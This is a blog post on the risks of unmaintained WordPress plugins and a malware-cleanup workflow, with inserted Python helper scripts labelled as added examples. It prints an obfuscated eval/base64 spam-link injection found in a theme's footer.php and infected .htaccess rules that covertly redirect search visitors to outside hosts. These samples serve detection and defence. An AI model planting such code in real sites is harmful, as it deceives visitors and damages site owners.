The Good, the Bad, and the Ugly of WordPress Plugins

The Ugly

Looking at my calendar, it is July 2018 and I have already received requests to clean out four WordPress websites that were infected with malware since January. The common cause of all four infections was unmaintained plugins. Google had actually red-flagged these websites, warning visitors of potential malware and causing heartache to the owners.

My workflow to remove the discovered malware is presented further into this post.

The Good

Plugins are ways to extend and add to the functionality that already exists in WordPress.
The core of WordPress is designed to be lean and lightweight, to maximize flexibility and minimize code bloat. Plugins then offer custom functions and features so that each user can tailor their site to their specific needs. [WordPress Codex]


The WordPress ecosystem makes it easy for anyone, especially those with no technical skills, to install useful features into their WordPress website. A plugin is code that a developer bundles into a package (the plugin); the user then “plugs” it into their website for added functionality.

Examples of some functionality features: Photogallery, video gallery, contact form, social media sharing, security, SEO optimization, and more. In fact, as of this post date, there are 55,510 plugins listed in the WordPress Plugin Repository. This number does not include the hundreds of 3rd party plugins that are also available outside of the WordPress Repository.

There are both Free and Premium plugins available for use. All the plugins listed in the WordPress Plugin Repository are free, but some have options to upgrade to a premium paid version that offer even more features.

Simple
Installing plugins is not hard to do.
WordPress was designed for the non-techie; it makes it easy for users to install plugins on their website without knowing a single line of code.

The Bad

Installation

Like any good thing, there is also a downside of these wonderful plugins.
Before installing any plugin from within the WordPress Repository, there are a few crucial checks you should perform. It can save you much difficulty down the road.

1) Check Last Updated date.

In this example, 11 years is a big red flag; you could be open to vulnerabilities if you install this plugin. This usually indicates that the plugin has been abandoned by the developer. Look for a plugin that has been updated within the current year, or at worst no longer than one year ago.

2) Check Support Forum Tab
Key things to look for (potential red flags):
1. See how many visitors viewed a question.
   How frequently are people asking for support?
   Are there any duplicate or repeated problems?

2. Are there any replies?
   Did the developer respond with a fix or answer?
   How long did it take the developer to reply (see the time and date in the last column)?
   If there are a lot of threads with 0 replies, you need to question the support; the developer may not have time to answer.

Active Installations – This is not a count of downloads, but of how many websites have the plugin actively installed. In other words, how many website owners find this plugin beneficial and have it activated.

Sometimes a low number of active installs does not mean the plugin is unpopular or has problems, for the following reasons:
1. It could be a new plugin that may have just been published.

2. A plugin that handles an unusual feature that is not commonly used (example: plugin that gives you a pink dashboard).

Tested Up To – You want to be sure the plugin is compatible with the most current WordPress core release. There is a correlation between this test and the plugin updates: if a particular plugin has not been updated in a year, it stands to reason that it was not tested against the latest WordPress core update.

This could lead to compatibility problems, as either the plugin will not work with the latest core updates, or it will break the website. Either way, it is not a good thing.
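The checks above (last updated date, tested-up-to version, support responsiveness, active installs) can be applied mechanically to the data WordPress.org publishes for each plugin. The following is an added example, not code from the original post: it assumes a record shaped like the public WordPress.org plugin information API (fields `last_updated`, `tested`, `active_installs`, `support_threads`, `support_threads_resolved`); the two records below are constructed, not real plugins.

```python
"""Triage a plugin record against the pre-install checklist (added example)."""
from datetime import date

# Thresholds taken from the post: updated within a year, tested on the current core.
MAX_AGE_DAYS = 365
MIN_RESOLVED_RATIO = 0.5        # assumption: fewer than half of threads resolved is a red flag
LOW_INSTALLS = 1000             # assumption: below this, look closer (may just be new or niche)


def _version_tuple(version):
    """'4.9.7' -> (4, 9): only major.minor matters for 'Tested up to'."""
    parts = version.split(".")
    return tuple(int(p) for p in parts[:2] if p.isdigit())


def assess_plugin(info, today, current_core):
    """Return a list of human-readable red flags for one plugin record."""
    flags = []

    # 1) Last Updated: the API value looks like '2018-07-10 9:23pm GMT'; keep the date part.
    updated = date.fromisoformat(info["last_updated"].split()[0])
    age_days = (today - updated).days
    if age_days > MAX_AGE_DAYS:
        flags.append(f"last updated {age_days} days ago (possibly abandoned)")

    # 2) Tested Up To: compare against the core version you are running.
    tested = info.get("tested") or ""
    if not tested:
        flags.append("no 'Tested up to' version declared")
    elif _version_tuple(tested) < _version_tuple(current_core):
        flags.append(f"tested up to {tested} but current core is {current_core}")

    # 3) Support tab: how many recent threads did the developer actually resolve?
    threads = info.get("support_threads", 0)
    resolved = info.get("support_threads_resolved", 0)
    if threads >= 10 and resolved / threads < MIN_RESOLVED_RATIO:
        flags.append(f"only {resolved}/{threads} recent support threads resolved")

    # 4) Active installs: low numbers deserve a second look, not automatic rejection.
    if info.get("active_installs", 0) < LOW_INSTALLS:
        flags.append(f"fewer than {LOW_INSTALLS} active installs (may simply be new or niche)")

    return flags


# Constructed sample records (not real plugins).
SAMPLE_ABANDONED = {
    "name": "Example Captcha", "slug": "example-captcha",
    "last_updated": "2015-03-02 4:10pm GMT", "tested": "4.1.1",
    "active_installs": 30000, "support_threads": 12, "support_threads_resolved": 1,
}
SAMPLE_HEALTHY = {
    "name": "Example Forms", "slug": "example-forms",
    "last_updated": "2018-06-28 11:05am GMT", "tested": "4.9.7",
    "active_installs": 2000000, "support_threads": 40, "support_threads_resolved": 35,
}
TODAY = date(2018, 7, 15)
CURRENT_CORE = "4.9.7"

if __name__ == "__main__":
    for rec in (SAMPLE_ABANDONED, SAMPLE_HEALTHY):
        print(rec["slug"], "->", assess_plugin(rec, TODAY, CURRENT_CORE) or ["looks fine"])
```

Run it against the JSON returned for each installed plugin and review anything that returns more than one flag; a low install count alone is not a verdict, as the post notes.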

So What Happened?

This is a short overview of how these websites got infected with malware.

Website 1
This WordPress site was built about 8 years ago. At that time, all the plugins installed were current.
Somewhere along those 8 years, a developer abandoned support of a plugin.
The owner of the website never realized this, although he always updated his plugins, he never checked to see the status of each plugin.
Infected Plugin: Captcha – not updated in 3 years, red-flagged “Critical” by Wordfence.

Website 2
The owner of this website wanted to perform his own maintenance.
He noticed that the website was receiving a high amount of 404 errors.
After reading an article about how 404 errors can affect his SEO, he wanted to fix this issue.
As one who enjoys getting his hands dirty, he found a plugin called: “404 to 301 Redirect, Log and Notify 404 Errors,” hoping that it would solve this issue.

Well, it turned into every website owner’s nightmare: Google placed a huge warning on his website, “The Website Ahead Contains Malware.”

From my understanding, the developer of this plugin has since updated this plugin, sanitizing it of all malware.
Unfortunately, the damage had already been done.

Infected Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors – Wordfence had flagged this plugin as “Harmful” as it injected spam links in the content.

Website 3
The person who maintained the website for this small business had left, so a new user who had never worked with WordPress took over the maintenance and content updates for this shop.
In looking for a plugin to handle a specific need, she unknowingly installed a plugin that contained PHP Object Injection Vulnerabilities.

Infected plugin: Appointments – This plugin was flagged by Wordfence as “Critical” Severity 9.8.
This plugin has recently been updated correcting the problem.

Website 4
This was a difficult case, as Google flagged this website as “Social Engineering Content Detected.” Normally social engineering content is tied to ads, but this website had neither ads nor affiliate links.

A scan was performed, with negative results.
So the only option I had at this juncture was to reinstall the entire website from an older backup, trusting that this copy was saved prior to the infection.

I submitted a review request to Google Search Console, and three days later I received a response that the review was successful and the website was cleared.

Troubleshooting 1

This is a troubleshooting workflow that I executed to find and remove malware on WordPress sites.
This process may be similar to yours, while others may have a totally different approach.
Most of what I learned was through trial and error, with many failures and disappointments along the way.

Hopefully, this guide will help you get started, with the eventual goal of having any Google warnings removed. This includes phishing, spamming, redirects or social engineering content.

Before we get started, here are the tools and resources required:

  • A backup of your website, not stored on your server
  • An account with Google Search Console
  • Familiarity with the WordPress core files
  • Familiarity with cPanel
  • An FTP (File Transfer Protocol) client, or familiarity with the cPanel File Manager
  • A text editor (NOT a word processor)
  • An account with the WordPress Support Forums

Troubleshooting 2

Backup
Before we start troubleshooting and deleting or editing files, make sure a backup of your website is available.
If for some reason you don’t have a backup, create one now!
There are many free plugins available to provide this service.

If you have several copies of your backups, check to see the date of the oldest copy you have.
Flag this copy for possible use later and if the backup is stored on your server, copy it to your computer, USB drive or in the cloud so you can access it at any time.

Purpose of having a backup
If you should accidentally delete the wrong folder or files, or edit these files incorrectly, you can restore the website.
Yes, the malware may still be in the backup copy, but at least you can reset your website to start over again.
WordPress Support Forums

One great advantage of WordPress is its huge community support.
If you are having difficulty, submit your question in the forum and you will receive guidance and advice.
So it is to your advantage to sign up and become part of this huge community; it’s free!

Note
You do not need to sign up to search for an answer.
You do need to sign up to submit a question.

Support Forum

Troubleshooting 3

Google Search Console

If you currently have a Gmail account, you have access to all the Google tools and resources such as Gmail, YouTube, Drive, Calendar, Photos, and the Search Console.
How to add a website property to Google Console

So why is the Google Search Console important?
1) To receive Google Alerts for critical errors or issues found on your website.
2) In most cases, Google will even show you where the malware content is located.
3) To submit a Request for Review, you’re required to have your website added as a Property on your account.
 

This is a sample of an actual hacked site I worked on, where Google flagged the location of the unauthorized files for you.

Troubleshooting 4

Scanning Tools available
How these scanners can help you.
1) If you are new to the Google Search Console and recently added your website to the console:

  • You will have to wait until a Site Verification has been completed
  • Then data collection can begin on your website

In the meantime, you can start using these scanners to help you troubleshoot your website.

2) If you already have an account, you can verify what Google has found with these scanners. Sometimes Google cannot list the “Deceptive Pages,” so a scanner may be able to provide clues for locating the malware.
Online Malware Scanners

Tools to assist you in finding deceptive malware content on your website.
Scanner – Description
Sucuri Site Check – Scan your site for malware, errors and blacklisting status for free!
urlscan – urlscan.io allows you to scan a website and analyze the resources it requests and the domains it contacts. Understand what your website is doing.
VirusTotal – Analyze suspicious files and URLs to detect types of malware, automatically share them with the security community.
PhishTank – PhishTank is a collaborative clearing house for data and information about phishing on the Internet.
Norton SafeWeb – Norton Safe Web scans millions of websites to make sure they are safe. Visit Norton Safe Web now to see if a website you are interested in is safe to visit.
Quttera – Registration required: free online heuristic URL scanning and malware detection. Scan websites for malware, exploits and other infections with the Quttera detection engine.
WebInspector – A free, cloud-based service that performs a website security check, removes malware and helps you protect websites from hackers.

Plugins with a scanner
Wordfence
The free version can be found in the WordPress Plugin Repository.

Sample screenshot of a Wordfence scan that found vulnerabilities in an actual infected website.

All the files marked Critical in Red were found and deleted.
 

Another plugin that contains a scanner is:
Defender

Defender can be installed from the WordPress Plugin Repository and is Multi-site compatible.

Troubleshooting 5

Examine WP Core Files

If you are new to WordPress, you can skip this step.
Since you are not familiar with the WordPress core files, you won’t be able to distinguish unauthorized folders and files from the legitimate ones. So it would be best to leave this step to someone familiar with WordPress, or trust one of the scanners.

To perform an audit of the WordPress core files, you will need to use one of the tools below to view the files:

  1. An FTP application such as FileZilla or Cyberduck
  2. cPanel: File Manager

This is a sample snapshot of clean WordPress Core Files: First Level

This is a sample snapshot of Malware found
I am sorry, I didn’t take a screenshot of the actual malware folders found in the WordPress core while using FileZilla (FTP).
I had already moved them off the server to a separate folder on my USB Drive.

I was able to immediately recognize that these folders were not part of the normal WordPress core structure. They were deleted from the server, but I saved the files on a USB drive to analyze later.

Troubleshooting 6

WordPress Themes

Fundamentally, the WordPress Theme system is a way to “skin” your weblog. Yet, it is more than just a “skin.” Skinning your site implies that only the design is changed. WordPress Themes can provide much more control over the look and presentation of the material on your website. [WordPress Codex]

Questions you need to ask:

  • Have the themes been updated?
  • Have unused themes been deleted?
  • Are you using Free themes from outside the WordPress Theme Directory?

Theme Installation Precheck:

Before you install any theme, it is recommended that you follow the same checks as for installing plugins.

1) Check Last Updated date.
2) Check Active Installations.
3) Check Support: does the developer answer in a timely manner?

Like plugins, your themes need to be updated immediately, and unused themes deleted, especially free themes found outside of the WordPress Theme Directory.

Everybody loves free things, but sometimes the wrong theme may give the user more than they bargained for.
How about headaches? That beautiful looking theme could end up running spam bots, redirecting visitors to another site, or placing ads on your website without your permission.

On the other hand, free themes from the WordPress Theme Directory are wonderful; they are pre-inspected and certified for safe use.

How to test a theme

First, install the theme on your site, but don’t activate it.
Next, install the Theme Authenticity Checker (TAC) from the WordPress Plugin Directory; it’s free.
Just follow the steps on the Themes page after this plugin is activated.

Side note: some premium themes may display warnings when tested.
If you look at the warnings, they are not for malicious code.
The reason is that many of these themes were never intended to be added to the WordPress Theme Directory, so they were not written to pass the WordPress.org requirements or standards.

Here is a sample screenshot of a TAC scan result:


Image courtesy of BuiltBackwards

 

The theme that is red flagged needs to be deleted ASAP!

Checking Theme Files Manually

This process can be a bit tedious, and not for the faint of heart.
It is something a developer might take the time to pursue and investigate.
1) If a theme is red-flagged during a test, you may want to find out where the malicious code is located, and how it is injected into the files.
2) Manually open the theme files by unzipping the folder. Normally the malicious code can be found in the following files:

  • footer.php
  • header.php
  • functions.php

Actually, unwanted code could be in other files, but I have normally found it in these three.

Sample
Here is an actual sample of malicious code found in the footer.php file of a free theme.
This theme was not from the WordPress Theme Directory.
footer.php file:

<?php eval(gzinflate(base64_decode
("ZZHPTsMwDMbPnbR3sHJYNmm00naDND0AJ26UCye
UtW5TkTZV4tFN4oV4DZ6M/hnatMkX258/+Sc7kSK
vviAzyvuYFdYSOibnsyAIboUPOhCTi8y2R
xAKtMMiZhGTIml1Cztjy6op7JI3qka+eoBEikhJWMMT
+qpsMIfdhVETtfdR1HVd6AmVIe2RqGpKH2a2ZkAVGYxZO
mmQnkQmrzvDkjX8/oBIzhAwUUCPgZm2wIGHuSJc8vc
JDb7hTWONkI9wl2j8As3sD3t3bJUz1g1c0edmu3XKk
/IYaqoNly94qgeQEMTO9Qecz84XSgrEPHbeb5h8bsh
VODLD8jVNV7CA68l+TY0N+bvJ8ngqzx4R9b8Zv/
SfDfEH"))); ?>

 

I have seen enough PHP code to recognize that this is not your normal footer.php file.
This is suspicious concealed (obfuscated) code, and it was checked in VirusTotal, which verified that it is malicious.

Results of the test:

So let’s decode this code.
De-obfuscating it with UnPHP.net gives the result shown below:


<?php ?><div class="footer">
<div class="footer_txt">© <a href="/"><?php bloginfo('name'); ?></a>,
Designed by <a href="http://www.stealthsettings.com" title="Stealth Settings">Stealth Settings</a>,
<? bloginfo( 'name' ); echo ' '.date('Y'); ?> |
Theme design by <a href="http://www.luxuryparlor.com/k233rastase.html">Kerastase</a>. <br>
<a href="/?feed=rss2">Entries</a> (RSS)
&amp; <a href="/?feed=comments-rss2">Comments</a> (RSS)</div>
</div>

 

As you can see, unwanted links are inserted into your footer, pointing to foreign websites.
Notice that the Base64 encoding scheme is used to “hide” the actual malicious code inside the obfuscation wrapper.

I am not familiar with how this malicious code is initiated; one possible method is the eval() function.
 

Read more about: Eval
 

Caution
“The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.” (PHP.net)
 

More resources on Base64 code.

Look at the obfuscated footer.php sample above to see the eval() and base64_decode() calls.
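The footer.php sample above wraps its payload in eval(gzinflate(base64_decode("..."))); UnPHP.net peels those layers off without running them. The block below is an added example, not code from the post or from UnPHP: it does the same static unwrapping in Python (Python's zlib raw inflate stands in for PHP's gzinflate, base64.b64decode for base64_decode) on a constructed, harmless payload built in the block itself, so you can inspect what a wrapper contains before deciding to delete the theme.

```python
"""Statically unwrap eval(<decoders>("...")) wrappers without executing them (added example)."""
import base64
import codecs
import re
import zlib

# PHP decoder name -> Python equivalent. These four are the wrappers commonly seen
# in obfuscated theme files; anything else is reported rather than guessed.
DECODERS = {
    "base64_decode": lambda b: base64.b64decode(b),                  # non-strict, skips whitespace like PHP
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),      # raw DEFLATE == PHP gzinflate
    "gzuncompress": lambda b: zlib.decompress(b),                    # zlib-wrapped == PHP gzuncompress
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
}

# eval( f1( f2( "literal" ) ) ) ;   -> group 1 = chain of function calls, group 2 = literal
WRAPPER_RE = re.compile(r'eval\s*\(\s*((?:\w+\s*\(\s*)+)["\']([^"\']+)["\']\s*\)+\s*;?')


def unwrap(php_source, max_layers=10):
    """Return (source with wrappers replaced by their decoded payload, number of layers peeled).

    Layers are peeled from the inside out, and the decoded text is spliced back in place
    of the eval() call so surrounding markup is preserved. Nested wrappers (a payload that
    is itself an eval() wrapper) are handled by looping up to max_layers times.
    """
    current, layers = php_source, 0
    for _ in range(max_layers):
        m = WRAPPER_RE.search(current)
        if not m:
            break
        funcs = re.findall(r"\w+", m.group(1))
        data = m.group(2).encode("latin-1")
        for func in reversed(funcs):          # innermost call is applied first
            if func not in DECODERS:
                raise ValueError(f"unknown wrapper {func}(); inspect manually")
            data = DECODERS[func](data)
        current = current[:m.start()] + data.decode("latin-1") + current[m.end():]
        layers += 1
    return current, layers


def _php_style_pack(plain):
    """Build a wrapper the way the footer.php sample was built (constructed test input only)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)      # raw DEFLATE, as PHP gzdeflate
    raw = comp.compress(plain.encode("latin-1")) + comp.flush()
    return '<?php eval(gzinflate(base64_decode("%s"))); ?>' % base64.b64encode(raw).decode("ascii")


# Constructed payload: a harmless echo of a hidden link, standing in for the real spam footer.
SAMPLE_PLAINTEXT = "echo \"<a href='http://spam-link.invalid/'>hidden link</a>\";"
SAMPLE_WRAPPED = _php_style_pack(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("wrapped :", SAMPLE_WRAPPED)
    decoded, n = unwrap(SAMPLE_WRAPPED)
    print(f"decoded ({n} layer(s)):", decoded)
```

Feed it the contents of footer.php, header.php or functions.php; a result with one or more layers peeled is worth reading line by line, and a ValueError tells you the file uses a wrapper this decoder does not know, which is itself a reason to replace the theme.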

 

Replace With Fresh New Theme

If you are not sure, or just to be safe, replace your theme with a fresh copy of the latest version available.

Troubleshooting 7

.htaccess file

The .htaccess is a distributed configuration file, and is how Apache handles configuration changes on a per-directory basis.
WordPress uses this file to manipulate how Apache serves files from its root directory, and subdirectories thereof. Most notably, WP modifies this file to be able to handle pretty permalinks. [WordPress Codex]

Common Symptom of an Infected .htaccess File
Your website redirects all traffic to a strange site.

A basic and clean .htaccess file
This is how the .htaccess file should look after a fresh install of WordPress:

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

Important!
Always keep a backup of the .htaccess file stored away.
This file should be part of any backup package that you currently use.
Sample 1 Infected .htaccess File

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://XXXdarkweb.net/bad.php?t=3 [R,L]

This rule set checks whether a visitor was sent by one of the above search engines; if so, they are redirected to XXXdarkweb.net.

Sample 2 Infected .htaccess File

<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://blackmarketsales.tld [L,R]
</IfModule>

This rule set redirects all traffic to blackmarketsales.tld.

As far as I know, there are four ways a .htaccess file can be edited:
1. Manually edit the file: download it with an FTP client or with the File Manager in cPanel, edit it in your text editor and upload it back to the server.

2. Certain plugins automatically add rules as part of their functionality, for example caching plugins and security plugins.

3. Plugins such as Yoast SEO allow editing through their dashboard:
SEO > Tools > File Editor

4. Hacked: unauthorized rules injected through a backdoor file.

Where does a backdoor come from?
Malicious backdoor code is introduced through bad plugins or themes.
It is usually embedded within their PHP files, or it can even be a standalone file.

Discovering a hacked .htaccess File

  • Google’s Safe Browsing will detect and flag your website
  • You notice your website is being redirected; customers and other people will also inform you
  • Your online business suddenly has no traffic or sales
  • The scanners listed above will mark suspicious files

Important!
You may have already found and removed malicious folders and files discovered during a manual or scanner search.
But you are not done!
You need to check the .htaccess file to see if there are any unauthorized rules left behind.
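The two infected samples above share one tell: a RewriteRule whose target is a full URL on a host that is not your own, often guarded by RewriteCond lines on HTTP_REFERER so that only visitors arriving from a search engine are redirected (and the owner, typing the address directly, sees nothing wrong). The block below is an added example, not code from the post: a small .htaccess checker that reports exactly that pattern, run here against the clean WordPress block and the two infected samples from this section, which are embedded as its input.

```python
"""Report .htaccess rewrite rules that send visitors to another host (added example)."""
from urllib.parse import urlparse

# Referrer substrings from the post's first sample; a referrer-gated off-site redirect
# is the classic "cloaked" infection that the site owner never sees.
SEARCH_ENGINES = ("google", "bing", "yahoo", "msn", "ask.com",
                  "aol", "live.com", "altavista", "excite")


def analyze_htaccess(text, site_host):
    """Return [(line_number, reason), ...] for every RewriteRule that redirects off-site."""
    findings = []
    pending_conds = []        # RewriteCond lines apply to the next RewriteRule only
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts:
            continue
        directive = parts[0]
        if directive == "RewriteCond":
            pending_conds.append(" ".join(parts[1:]))
        elif directive == "RewriteRule":
            target = parts[2] if len(parts) > 2 else ""
            host = urlparse(target).netloc.lower() if "://" in target else ""
            if host and host != site_host.lower():
                reasons = [f"redirects to external host {host}"]
                referer_conds = [c for c in pending_conds if "HTTP_REFERER" in c]
                if any(se in c.lower() for c in referer_conds for se in SEARCH_ENGINES):
                    reasons.append("only when the visitor arrives from a search engine (cloaked redirect)")
                elif referer_conds:
                    reasons.append("conditional on the Referer header")
                findings.append((lineno, "; ".join(reasons)))
            pending_conds = []      # conditions are consumed by the rule that follows them
    return findings


# Inputs: the clean WordPress block and the two infected samples quoted in this section.
CLEAN = r"""
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""
SAMPLE1 = r"""
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://XXXdarkweb.net/bad.php?t=3 [R,L]
"""
SAMPLE2 = r"""
<IfModule mod_rewrite.c>
        RewriteEngine On
        RewriteBase /
        RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
        RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
        RewriteRule ^.*$ http://blackmarketsales.tld [L,R]
</IfModule>
"""

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("sample 1", SAMPLE1), ("sample 2", SAMPLE2)):
        print(name, "->", analyze_htaccess(text, "example.com") or "no off-site redirects")
```

Pass your own domain as `site_host` so legitimate redirects to www or https variants of your site are not reported; anything else it prints is a line to compare against your clean backup copy before deciding whether a plugin added it.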
Two ways to fix the .htaccess file
1. Download the file and manually delete the malicious rules.

2. Safer and easier method: replace the current .htaccess file with a clean backup copy.
Reason: most WordPress .htaccess files have a lot of rules added by various plugins. So unless you know how to read the directives in the .htaccess file, it may be difficult to know whether you are removing the correct lines. If performed incorrectly, you can break your website.

So sometimes starting over with a fresh copy of your .htaccess file is the safer choice.

Additional .htaccess Resources
WordPress.org

Sucuri

Wordfence

Troubleshooting 8

Database

The WordPress database is another popular place for hiding malicious content.
It is also the least managed part of the WordPress platform, as the majority of WordPress owners trust their hosting providers to maintain their servers.

So when it comes to troubleshooting the database, most website owners balk at the thought of tinkering with the database.

Thank goodness, there are tools available to help you get your hands dirty with the WordPress database.

Important!
Before you get your hands on the database, be absolutely sure you have a full backup of your database.
If you have several older backups, that would be even more awesome.
 

Search

This is where hackers hide spam links, add malicious iframes to posts and pages, and even smuggle in CSS rules such as:

h1.spam {
    display: none;
}

They will try to hide the link using the CSS display: none property, so you cannot see the spam link, but Google will find it and place a warning on your website.

What to search for?
1. If you know the subject or topic that your website is spamming:
try looking for: adult, viagra, shoes, budget, etc.
2. Malicious PHP functions:
try looking for: eval, base64_decode, gzinflate, preg_replace, str_replace, shell_exec.
(I share more info about eval and base64_decode in Troubleshooting 6 above)
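The phpMyAdmin search described below is a plain substring match, one term at a time. The block below is an added example, not code from the post: it runs the same kind of search over exported rows with pattern matches instead of single keywords, so a hidden link (display: none immediately wrapping an anchor, or a <style> block hiding a class as in the h1.spam example), an iframe, a PHP wrapper function or a spam keyword from the list above are all found in one pass. The rows are constructed samples shaped like wp_posts, wp_options and wp_comments records, not data from a real site.

```python
"""Scan exported WordPress rows for hidden spam, iframes and PHP wrappers (added example)."""
import re

# Each label is a reason a human should open the row in phpMyAdmin's Browse view.
PATTERNS = {
    # inline display:none on the element that directly contains a link
    "hidden link": re.compile(r"display\s*:\s*none[^>]*>\s*<a\s", re.I),
    # a <style> block that hides a class, e.g. h1.spam{display:none} from the post
    "style hiding": re.compile(r"<style[^>]*>[^<]*display\s*:\s*none", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    # the post's list of PHP functions that have no business in content or options
    "php wrapper": re.compile(r"\b(eval|base64_decode|gzinflate|preg_replace|str_replace|shell_exec)\s*\(", re.I),
    # extend this with the topic your site is spamming (the post suggests adult, shoes, budget, ...)
    "spam keyword": re.compile(r"\b(viagra|casino|payday)\b", re.I),
}


def scan_rows(rows):
    """rows: iterable of (table, row_id, column, value).

    Returns [(table, row_id, column, [matched labels]), ...] in input order,
    so the output maps directly onto what you would Browse and delete.
    """
    hits = []
    for table, row_id, column, value in rows:
        labels = [label for label, rx in PATTERNS.items() if rx.search(value or "")]
        if labels:
            hits.append((table, row_id, column, labels))
    return hits


def summarize(hits):
    """Count hits per table; useful for deciding whether to clean rows or restore a backup."""
    counts = {}
    for table, _, _, _ in hits:
        counts[table] = counts.get(table, 0) + 1
    return counts


# Constructed sample rows (table, id, column, value); spam-link.invalid is a reserved placeholder.
SAMPLE_ROWS = [
    ("wp_posts", 12, "post_content", "<p>Welcome to our shop.</p>"),
    ("wp_posts", 15, "post_content",
     '<p>Hours: 9-5</p><div style="display:none"><a href="http://spam-link.invalid/pills">buy viagra</a></div>'),
    ("wp_posts", 18, "post_content",
     '<style>h1.spam{display:none}</style><h1 class="spam"><a href="http://spam-link.invalid">x</a></h1>'),
    ("wp_options", 231, "option_value",
     'a:1:{s:4:"code";s:28:"eval(base64_decode("aGk="));";}'),
    ("wp_comments", 40, "comment_content",
     '<iframe src="http://spam-link.invalid/x" width="1" height="1"></iframe>'),
]

if __name__ == "__main__":
    found = scan_rows(SAMPLE_ROWS)
    for table, row_id, column, labels in found:
        print(f"{table}#{row_id} {column}: {', '.join(labels)}")
    print("per table:", summarize(found))
```

To use it on a real site, export the tables from phpMyAdmin (or read a mysqldump) into (table, id, column, value) tuples; review each reported row in the Browse screen before deleting, because a `str_replace(` in a legitimate code-snippet post or a `display:none` used by a theme for a mobile menu will also be reported.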
 

Tools

Here are three tools that can help you search, find and remove any unauthorized code within your database.

1. PhpMyAdmin located in your CPanel or Plesk dashboard.
2. ARI Adminer Plugin – WordPress Database Manager
3. Better Search Replace Plugin

phpMyAdmin

Important!
Before you start, do you have a backup or backups?

Step 1 You should be familiar with your cPanel, so after logging in, open the phpMyAdmin icon.
If you are not sure what you are doing, I suggest you leave this step to a professional, developer, or someone who has experience with the WordPress backend.

You need to know what database you are working on.
If not, see “How to Find Your Database Name”.
In the left side panel, select your database.
Double click to access the database.

Step 2 Search

  • Open the Search Tab
  • Fill in search criteria
  • Select All (tables)
  • Click GO

Step 3 Search Results

I suggest you click Browse to view the record.
You can now verify that this is the content you want to delete.
If you are really sure, you can delete the record now, bypassing the Browse option.

Step 4 Browse Screen

  • You can Delete a single line item
  • Or Check All and Delete everything

Restore with a Backup

Another method to remove any malicious content from your database is to restore it from a clean backup copy. That’s why you should make it a habit to keep several backups going back a month or two.

If you restore your database from a recent copy, it may still contain the malware.

Here is a link to a great tutorial on how to restore a backup with phpMyAdmin:
How to Backup and or Restore your MySQL Database Using phpMyAdmin
Using Plugins

ARI Adminer

– WordPress Database Manager Plugin.

Better Search Replace

– WordPress Plugin

When moving your WordPress site to a new domain or server, you will likely run into a need to run a search/replace on the database for everything to work correctly.

  • Serialization support for all tables
  • The ability to select specific tables
  • The ability to run a “dry run” to see how many fields will be updated
  • No server requirements aside from a running installation of WordPress
  • WordPress Multisite support


Request Google Review

You successfully removed the malware from your website.
You tested your website and everything seems good to go.

But visitors will still see the Google warning attached to your website.
“The site ahead contains malware”
Your website may now be clean, but the red flag is still attached to the website.

The next and final step is to Request a Review through Google.
 

Prerequisites

  • Have an active account with Google Search Console (see Troubleshooting 3)
  • Have verified ownership of your site through Google Search Console
  • Subject website is clean of all malicious files

In your Google Search Console dashboard, open Messages and click on the Malicious Content message.
This page should appear, and if you are certain that your website is clean, Click Request A Review.
On this next page, Google wants to know what you did to clean your website.
In this example, I submitted a very short explanation.
Usually, I insert a much more detailed workflow and would suggest you do so also.
Sample
Hello,
The following process was used to clear this website of any malicious content:
1) Deleted 2 plugins that were not updated in 3 years, flagged critical after scan.
2) Deleted folders and files that were suggested by Google Search Console as being malicious.
3) Tested website with Sucuri Site Check, urlscan, and Virustotal, all results satisfactory.
This website is ready to be reviewed.
Thank you.
Your Name

Google mentions that a response may take up to 72 hours.
